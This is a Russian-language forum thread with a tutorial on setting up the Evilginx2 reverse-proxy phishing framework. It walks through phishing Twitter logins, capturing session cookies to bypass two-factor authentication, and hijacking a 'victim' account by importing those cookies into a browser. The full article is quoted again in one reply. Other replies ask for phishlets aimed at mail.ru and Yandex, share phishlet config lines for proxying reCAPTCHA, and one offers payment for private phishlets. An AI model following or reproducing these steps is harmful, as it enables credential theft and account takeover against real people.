• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Статья Evilginx2 - Фишинг, Обход ДФА

Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 453
4 289
Приветствую, гостей и участников форума Codeby.net.

В этой статье, речь пойдет о фишинге и обходе двухфакторной аутентификации с помощью замечательного инструмента – Evilginx2. Про его первую версию, я уже писал, кому интересно, могут поискать. Но статья получилось скудной, так как, не было сильного желания вникать в функционал, поэтому вышел простой обзор на этот софт.

Вторая же, версия Evilginx, привлекла меня своей особенностью помогать тестировщикам на проникновение, и прочим хорошим людям обходить двухфакторную аутентификацию, и получать учетные данные от различных аккаунтов цели.

Итак, приступим к работе…

Evilginx2 - Фишинг, Обход ДФА


Evilginx2 - это фреймворк типа «man-in-the-middle», используемый для фишинга учетных данных для входа в систему наряду с сеансовыми cookie-файлами, что, в свою очередь, позволяет обойти защиту двухфакторной аутентификации.

Этот инструмент является преемником Evilginx, выпущенного в 2017 году, который использовал пользовательскую версию HTTP-сервера nginx для обеспечения функционала «man-in-the-middle» в качестве прокси между браузером и фишинговым веб-сайтом. Настоящая версия, полностью написана на GO, как отдельное приложение.

Evilginx2 - реализует собственный HTTP и DNS-сервер, что делает его чрезвычайно простым в настройке и использовании.

В качестве атакующей системы я использую Kali Linux Full Upgrade, и так как Evilginx2 написан на GO, устанавливаем себе его последней версии:
  • исходные файлы в архиве.
Evilginx2 - Фишинг, Обход ДФА


Код:
wget https://dl.google.com/go/go1.11.5.src.tar.gz
Evilginx2 - Фишинг, Обход ДФА


И распаковываем его по указанному пути:

Код:
tar –C /usr/local –xzf go1.11.5.linux-amd64.tar.gz
Evilginx2 - Фишинг, Обход ДФА


Добавляем в свой .bashrc (или другой файл профиля) переменные, для запуска GO:

Код:
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin
Evilginx2 - Фишинг, Обход ДФА


Теперь, можем устанавливать Evilginx2:

Код:
go get -u github.com/kgretzky/evilginx2
cd $GOPATH/src/github.com/kgretzky/evilginx2
Evilginx2 - Фишинг, Обход ДФА


Код:
make
И осуществим пробный запуск, без настроек:

Код:
evilginx2
Evilginx2 - Фишинг, Обход ДФА


Переходим, непосредственно к практической части.

Убедитесь, что никакие службы в системе не прослушивают порты TCP 443, TCP 80 и UDP 53.

Код:
netstat –tplnu
Evilginx2 - Фишинг, Обход ДФА


Evilginx2 сообщит при запуске, если не удаcтся открыть прослушивающий сокет на любом из этих портов.

По умолчанию evilginx2 будет искать фишлеты в каталоге ./phishlets/, а затем в /usr/share/evilginx /phishlets/. Если вы хотите указать собственный путь для загрузки phishlets, используйте параметр -p <phishlets_dir_path> при запуске инструмента.

Вызов справки:

Код:
evilginx2 –h
Evilginx2 - Фишинг, Обход ДФА


Кроме этой, существует внутренняя справка по командам в самом Evilginx2.

Evilginx2 - Фишинг, Обход ДФА


Переходим, к настройке инструмента, перед проведением атаки.

Регистрируем домен и настраиваем серверы имен (ns1 и ns2) в панели администратора провайдера домена, чтобы они указывали на IP-адрес вашего сервера с Evilginx.

Evilginx2 - Фишинг, Обход ДФА


Настройте домен и IP-адрес вашего сервера, используя следующие команды:

Код:
config domain yourdomain.com
config ip (your ip)
Evilginx2 - Фишинг, Обход ДФА


Теперь вы можете настроить phishlet, который хотите использовать. В этом случае это будет phishlet Twitter. Установите имя хоста для phishlet (он должен содержать ваш домен).

Код:
phishlets hostname twitter twitter.com.maligncorp.com
Evilginx2 - Фишинг, Обход ДФА


Затем необходимо получить CNAME’s для фишлета twitter, и прописать их в админ панели Domain – провайдера:

Каноническое имя (запись CNAME) – это тип записи DNS, которая привязывает псевдоним к действительному (каноническому) доменному имени. Записи CNAME обычно используются для привязки субдомена, такого как www или mail к домену, в котором размещен контент этого субдомена. Например, запись CNAME может привязывать веб-адрес к фактическому веб-сайту для домена example.com.

Код:
phishlets get-hosts twitter
Evilginx2 - Фишинг, Обход ДФА


Добавляем эти имена в панели управления:

Evilginx2 - Фишинг, Обход ДФА


Включаем в работу фишлет:

Код:
phishlets enable twitter
Ждём получения сертификатов, и если всё прошло успешно – видим такой вывод:

Evilginx2 - Фишинг, Обход ДФА


Сделаем редирект, на оригинальный домен twitter’a:

Код:
config redirect_url http://twitter.com
Evilginx2 - Фишинг, Обход ДФА


Затем, необходимо создать приманку – фишинговый путь к форме авторизации в твиттере, делается это так:

Код:
lures create twitter
Evilginx2 - Фишинг, Обход ДФА


Копируем path и добавляем его к нашей фишинговой ссылке, в итоге, она должна выглядеть так:

Код:
https://twitter.com.maligncorp.com/jNvKjIkI
Поделимся ей с жертвой наших манипуляций и подождём результата, примерно такого:

Evilginx2 - Фишинг, Обход ДФА


Для цели, весь процесс выглядит так:

Evilginx2 - Фишинг, Обход ДФА


Да, знаю, ссылка выглядит стрёмно, (в защиту скажу – HTTPS) но кто на неё смотрит?:) В нашем то, случае.

Ввод логина и пароля… и:

Evilginx2 - Фишинг, Обход ДФА


Проверяем захваченные сессии, в случае, если пароль введен, верно, и вход в аккаунт осуществлён, в таблице, в столбце tokens будет значение captured, это означает, что помимо логина и пароля мы получили Cookies авторизованной сессии пользователя в twitter.

Evilginx2 - Фишинг, Обход ДФА


Чтобы не вводить логин и пароль, воспользуемся ими, чтобы войти в аккаунт жертвы:

Код:
sessions 7
Evilginx2 - Фишинг, Обход ДФА


Копируем всё это, переходим у себя в браузере на twitter.com, затем используя аддон, EditThisCookie импортируем данные и перезагружаем страницу:

Evilginx2 - Фишинг, Обход ДФА


С этим – всё ок, получилось. Теперь двухфакторная аутентификация, чуть справки:
  • Двухфакторная аутентификация — это метод идентификации пользователя в каком-либо сервисе (как правило, в Интернете) при помощи запроса аутентификационных данных двух разных типов, что обеспечивает двухслойную, а значит, более эффективную защиту аккаунта от несанкционированного проникновения. На практике это обычно выглядит так: первый рубеж — это логин и пароль, второй — специальный код, приходящий по SMS или электронной почте. Реже второй «слой» защиты запрашивает специальный USB-ключ или биометрические данные пользователя. В общем, суть подхода очень проста: чтобы куда-то попасть, нужно дважды подтвердить тот факт, что вы — это вы, причем при помощи двух «ключей», одним из которых вы владеете, а другой держите в памяти.
Рассмотрим ситуацию, когда, цели необходимо восстановить пароль, та же ДФА с помощью телефона.

Evilginx2 - Фишинг, Обход ДФА


Приходит СМС от сервиса, и вводим полученный код:

Evilginx2 - Фишинг, Обход ДФА


Жертва сбрасывает пароль, в этом случае мы его не получаем, наш профит – это cookie текущей сессии:

Evilginx2 - Фишинг, Обход ДФА


Смотрим, что у нас в сессии, и копируем данные для импорта в браузер:

Evilginx2 - Фишинг, Обход ДФА


Итог, вполне предсказуем:

Evilginx2 - Фишинг, Обход ДФА


Это всё, что я хотел рассказать. Evilginx2 - очень крутой инструмент, советую посмотреть содержимое папки /phislets, уверен, натолкнёт на определенные мысли.

В этой статье далеко не всё, но отработал Evil по всем моим требованиям.

P.S. Обзоры на него в youtube и т.д. не совсем актуальны. Упущена масса деталей.

Специально для CODEBY.NET
 
Последнее редактирование:
СталкерНэд

СталкерНэд

Member
14.02.2019
5
1
А как на счёт termux? Без рут прав возможно использовать этот инструмент? Я установил, но инструмент не находит порты. Это можно исправить?
 

Вложения

Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 453
4 289
  • Нравится
Реакции: Ondrik8
t0gl

t0gl

Well-known member
20.06.2018
161
185
Приветствую, гостей и участников форума Codeby.net.

В этой статье, речь пойдет о фишинге и обходе двухфакторной аутентификации с помощью замечательного инструмента – Evilginx2. Про его первую версию, я уже писал, кому интересно, могут поискать. Но статья получилось скудной, так как, не было сильного желания вникать в функционал, поэтому вышел простой обзор на этот софт.

Вторая же, версия Evilginx, привлекла меня своей особенностью помогать тестировщикам на проникновение, и прочим хорошим людям обходить двухфакторную аутентификацию, и получать учетные данные от различных аккаунтов цели.

Итак, приступим к работе…

Посмотреть вложение 26284

Evilginx2 - это фреймворк типа «man-in-the-middle», используемый для фишинга учетных данных для входа в систему наряду с сеансовыми cookie-файлами, что, в свою очередь, позволяет обойти защиту двухфакторной аутентификации.

Этот инструмент является преемником Evilginx, выпущенного в 2017 году, который использовал пользовательскую версию HTTP-сервера nginx для обеспечения функционала «man-in-the-middle» в качестве прокси между браузером и фишинговым веб-сайтом. Настоящая версия, полностью написана на GO, как отдельное приложение.

Evilginx2 - реализует собственный HTTP и DNS-сервер, что делает его чрезвычайно простым в настройке и использовании.

В качестве атакующей системы я использую Kali Linux Full Upgrade, и так как Evilginx2 написан на GO, устанавливаем себе его последней версии:
  • исходные файлы в архиве.
Посмотреть вложение 26285

Код:
wget https://dl.google.com/go/go1.11.5.src.tar.gz
Посмотреть вложение 26286

И распаковываем его по указанному пути:

Код:
tar –C /usl/local –xzf go1.11.5.linux-amd64.tar.gz
Посмотреть вложение 26287

Добавляем в свой .bashrc (или другой файл профиля) переменные, для запуска GO:

Код:
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin
Посмотреть вложение 26288

Теперь, можем устанавливать Evilginx2:

Код:
go get -u github.com/kgretzky/evilginx2
cd $GOPATH/src/github.com/kgretzky/evilginx2
Посмотреть вложение 26289

Код:
make
И осуществим пробный запуск, без настроек:

Код:
evilginx2
Посмотреть вложение 26290

Переходим, непосредственно к практической части.

Убедитесь, что никакие службы в системе не прослушивают порты TCP 443, TCP 80 и UDP 53.

Код:
netstat –tplnu
Посмотреть вложение 26291

Evilginx2 сообщит при запуске, если не удаcтся открыть прослушивающий сокет на любом из этих портов.

По умолчанию evilginx2 будет искать фишлеты в каталоге ./phishlets/, а затем в /usr/share/evilginx /phishlets/. Если вы хотите указать собственный путь для загрузки phishlets, используйте параметр -p <phishlets_dir_path> при запуске инструмента.

Вызов справки:

Код:
evilginx2 –h
Посмотреть вложение 26292

Кроме этой, существует внутренняя справка по командам в самом Evilginx2.

Посмотреть вложение 26293

Переходим, к настройке инструмента, перед проведением атаки.

Регистрируем домен и настраиваем серверы имен (ns1 и ns2) в панели администратора провайдера домена, чтобы они указывали на IP-адрес вашего сервера с Evilginx.

Посмотреть вложение 26294

Настройте домен и IP-адрес вашего сервера, используя следующие команды:

Код:
config domain yourdomain.com
config ip (your ip)
Посмотреть вложение 26295

Теперь вы можете настроить phishlet, который хотите использовать. В этом случае это будет phishlet Twitter. Установите имя хоста для phishlet (он должен содержать ваш домен).

Код:
phishlets hostname twitter twitter.com.maligncorp.com
Посмотреть вложение 26296

Затем необходимо получить CNAME’s для фишлета twitter, и прописать их в админ панели Domain – провайдера:

Каноническое имя (запись CNAME) – это тип записи DNS, которая привязывает псевдоним к действительному (каноническому) доменному имени. Записи CNAME обычно используются для привязки субдомена, такого как www или mail к домену, в котором размещен контент этого субдомена. Например, запись CNAME может привязывать веб-адрес к фактическому веб-сайту для домена example.com.

Код:
phishlets get-hosts twitter
Посмотреть вложение 26297

Добавляем эти имена в панели управления:

Посмотреть вложение 26298

Включаем в работу фишлет:

Код:
phishlets enable twitter
Ждём получения сертификатов, и если всё прошло успешно – видим такой вывод:

Посмотреть вложение 26299

Сделаем редирект, на оригинальный домен twitter’a:

Код:
config redirect_url http://twitter.com
Посмотреть вложение 26300

Затем, необходимо создать приманку – фишинговый путь к форме авторизации в твиттере, делается это так:

Код:
lures create twitter
Посмотреть вложение 26301

Копируем path и добавляем его к нашей фишинговой ссылке, в итоге, она должна выглядеть так:

Код:
https://twitter.com.maligncorp.com/jNvKjIkI
Поделимся ей с жертвой наших манипуляций и подождём результата, примерно такого:

Посмотреть вложение 26302

Для цели, весь процесс выглядит так:

Посмотреть вложение 26303

Да, знаю, ссылка выглядит стрёмно, (в защиту скажу – HTTPS) но кто на неё смотрит?:) В нашем то, случае.

Ввод логина и пароля… и:

Посмотреть вложение 26304

Проверяем захваченные сессии, в случае, если пароль введен, верно, и вход в аккаунт осуществлён, в таблице, в столбце tokens будет значение captured, это означает, что помимо логина и пароля мы получили Cookies авторизованной сессии пользователя в twitter.

Посмотреть вложение 26305

Чтобы не вводить логин и пароль, воспользуемся ими, чтобы войти в аккаунт жертвы:

Код:
sessions 7
Посмотреть вложение 26306

Копируем всё это, переходим у себя в браузере на twitter.com, затем используя аддон, EditThisCookie импортируем данные и перезагружаем страницу:

Посмотреть вложение 26307

С этим – всё ок, получилось. Теперь двухфакторная аутентификация, чуть справки:
  • Двухфакторная аутентификация — это метод идентификации пользователя в каком-либо сервисе (как правило, в Интернете) при помощи запроса аутентификационных данных двух разных типов, что обеспечивает двухслойную, а значит, более эффективную защиту аккаунта от несанкционированного проникновения. На практике это обычно выглядит так: первый рубеж — это логин и пароль, второй — специальный код, приходящий по SMS или электронной почте. Реже второй «слой» защиты запрашивает специальный USB-ключ или биометрические данные пользователя. В общем, суть подхода очень проста: чтобы куда-то попасть, нужно дважды подтвердить тот факт, что вы — это вы, причем при помощи двух «ключей», одним из которых вы владеете, а другой держите в памяти.
Рассмотрим ситуацию, когда, цели необходимо восстановить пароль, та же ДФА с помощью телефона.

Посмотреть вложение 26308

Приходит СМС от сервиса, и вводим полученный код:

Посмотреть вложение 26309

Жертва сбрасывает пароль, в этом случае мы его не получаем, наш профит – это cookie текущей сессии:

Посмотреть вложение 26310

Смотрим, что у нас в сессии, и копируем данные для импорта в браузер:

Посмотреть вложение 26311

Итог, вполне предсказуем:

Посмотреть вложение 26312

Это всё, что я хотел рассказать. Evilginx2 - очень крутой инструмент, советую посмотреть содержимое папки /phislets, уверен, натолкнёт на определенные мысли.

В этой статье далеко не всё, но отработал Evil по всем моим требованиям.

P.S. Обзоры на него в youtube и т.д. не совсем актуальны. Упущена масса деталей.

Специально для CODEBY.NET
У вас ошибка в комманде /usr/local/
 
  • Нравится
Реакции: Vander
S

singovvv

New member
12.02.2019
2
0
Спасибо за Статью на ютубе реально кусками всё разбросано а тут четко понятно!"
 
Apton

Apton

Well-known member
17.04.2017
45
141
Отличный инструмент! Спасибо за обзор. Хотелось бы увидеть разбор самостоятельной настройки конфига для ресурса, не включенного в список имеющихся, например mail.ru или yandex.
 
  • Нравится
Реакции: unost
turb0suslik

turb0suslik

Member
26.11.2018
19
3
Отличный инструмент! Спасибо за обзор. Хотелось бы увидеть разбор самостоятельной настройки конфига для ресурса, не включенного в список имеющихся, например mail.ru или yandex.
также подпишусь интересует это. Господа дополните статью пожалуйста любым ресурсом которого нет в списке.
 
  • Нравится
Реакции: unost
dominikanec

dominikanec

Премиум
31.01.2018
44
47
У меня проблемка возникла при создании своего сценария. На странице авторизации после ввода Л:П появляется капча от гугла, как сделать чтоб проксиролвать ее на страницу.

мои попытки результата не дали

Код:
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'google.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'www.gstatic.com', orig_sub: 'www', domain: 'gstatic.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
пробовал и такое
Код:
  - {phish_sub: '', orig_sub: 'www', domain: 'gstatic.com', session: true, is_landing: false, auto_filter:true}
  - {phish_sub: '', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false, auto_filter:true}
на оригинальной странице в заголовке есть:
HTML:
<script type="text/javascript" async="" src="https://www.gstatic.com/recaptcha/api2/v1550471573786/recaptcha__uk.js"></script>
<script src="https://www.google.com/recaptcha/api.js?hl=uk&amp;render=explicit&amp;onload=__reCaptchaLoaded"></script></head>
а после прокси этих двух скриптов нет. Может есть способ вручную вставить
 
Последнее редактирование:
Z

zhenyoker

Member
27.04.2017
10
3
Отличный инструмент! Спасибо за обзор. Хотелось бы увидеть разбор самостоятельной настройки конфига для ресурса, не включенного в список имеющихся, например mail.ru или yandex.
есть описание (не реклама)
 
  • Нравится
Реакции: Apton
U

unost

Member
04.07.2018
13
2
есть ли какое то решение для страниц с рекапчей?
 
Nobuf

Nobuf

Member
20.05.2019
21
9
бесплатный хостинг пойдет?
 
H

hardknocklife

Member
21.08.2019
9
0
Guys, can anyone help me install modlish or evilginx2, and also teach me how to make private phislets? Your time will be rewarded accordingly.
 
aserf

aserf

Member
29.12.2016
10
1
где можно зарегистрировать домен, чтоб вписывать свои CNAME можно было.А то где я зарегистрировал, после смены DNS возможность добавление записей пропала
 
M

m01sha

Member
20.09.2019
5
0
Последнее редактирование:
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб